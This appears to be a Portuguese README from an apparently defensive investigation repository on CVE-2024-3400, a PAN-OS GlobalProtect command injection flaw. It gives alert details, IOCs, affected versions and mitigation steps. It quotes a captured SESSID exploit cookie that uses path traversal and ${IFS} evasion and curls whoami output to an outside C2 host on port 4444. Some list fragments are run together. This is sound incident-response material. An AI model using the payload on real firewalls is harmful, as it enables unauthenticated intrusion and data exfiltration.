
Estratégias de detecção, análise e resposta para tentativas de exploração da CVE-2024-3400 direcionadas a portais GlobalProtect do Palo Alto PAN-OS. Inclui IOCs, padrões de exploração e orientações de mitigação.
Detecção, análise e estratégias de resposta para tentativas de exploração da CVE-2024-3400 visando portais GlobalProtect do Palo Alto PAN-OS. Inclui IOCs, padrões de exploração e orientações de mitigação.
Este repositório contém uma investigação detalhada e análise de ameaças da CVE-2024-3400, uma vulnerabilidade crítica de injeção de comandos não autenticada que afeta o software Palo Alto Networks PAN-OS, visando especificamente o portal GlobalProtect.
Em 18 de abril de 2024, foi detectada atividade de exploração contra um firewall PAN-OS interno usando o endpoint vulnerável /global-protect/login.esp. O atacante utilizou um cookie SESSID malicioso contendo um comando curl executado entre crases para alcançar um servidor C2 remoto hospedado em 144.172.79.92 (Miami, Flórida). O payload de exploração utilizou ${IFS} para contornar filtros simples e usou o diretório de telemetria do PAN-OS para preparar a atividade maliciosa. O firewall respondeu com 200 OK, indicando que o payload provavelmente foi executado com sucesso.

ID do Evento: 249
Regra de Detecção: SOC274 – Exploração de Injeção de Comandos PAN-OS
Horário do Evento: 18 de abril de 2024, 03:09 UTC
Nome do Host: PA-Firewall-01
IP de Destino: 172.16.17.139
IP de Origem: 144.172.79.92
Método da Requisição: POST
Endpoint: /global-protect/login.esp
Payload do Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Hashes Maliciosos:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
Script Malicioso: (executado usando )





SESSID para injeção de comandos${IFS} para evasão/opt/panlogs/tmp/device_telemetrydt_send após a exploração4444


10.2.9-h1, 11.0.4-h1 ou 11.1.2-h3144.172.79.92logs/: Logs de detecção processados e brutosioc/: Hashes de arquivos e IPs associados ao ataqueanalysis/: Análise aprofundada do comportamento da exploração e rastreamento de processosreport/: Resumo e imagens dos logs e códigos das minhas investigaçõesCVE-2024-3400 refere-se a uma vulnerabilidade crítica no Palo Alto Networks PAN-OS, afetando especificamente gateways GlobalProtect. Aqui está um resumo do que é publicamente conhecido sobre ela:
Pontuação CVSS: 10.0 (Crítica)
Publicada: Abril de 2024
Produtos Afetados: PAN-OS 10.2, 11.0 e 11.1 quando o GlobalProtect está habilitado.
Exploração: Confirmada na natureza (zero-day)
Tipo de Vulnerabilidade: Injeção de comandos não autenticada
A CVE-2024-3400 permite que atacantes não autenticados executem comandos arbitrários no sistema operacional do firewall. Isso essencialmente dá controle total sobre os dispositivos afetados sem a necessidade de credenciais — um ponto de violação sério para qualquer empresa que dependa de firewalls Palo Alto.
O gateway GlobalProtect deve estar habilitado.
Versões específicas do PAN-OS (10.2.x, 11.0.x, 11.1.x).
Explorável pela internet se não estiver atrás de camadas adicionais de segurança.
Enviar requisições maliciosas para explorar a falha de injeção.
Implantar shells remotos ou baixar payloads de segundo estágio.
O comportamento observado inclui:
Execução de comandos via URLs maliciosas
Mecanismos de persistência
Movimentação lateral dentro das redes
Corrija Imediatamente: A Palo Alto lançou correções; atualize para versões não vulneráveis (ex.: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 ou posteriores).
Verifique Indicadores de Comprometimento (IOCs) como processos suspeitos, conexões de saída ou histórico de CLI incomum.
Use ferramentas como Shodan ou inventários de ativos para encontrar dispositivos vulneráveis.
Procure por IPs externos acessando o GlobalProtect sem autenticação válida.
Verifique a execução de comandos suspeitos nos logs (show system processes, cat /etc/passwd, etc.).
Monitore o comportamento do firewall e alerte sobre conexões de saída anômalas.
Este repositório serve tanto como um relatório de investigação interna quanto como um recurso educacional para defensores que desejam entender a exploração real de vulnerabilidades do PAN-OS. Contribuições e observações adicionais são bem-vindas.
update.py/usr/bin/python3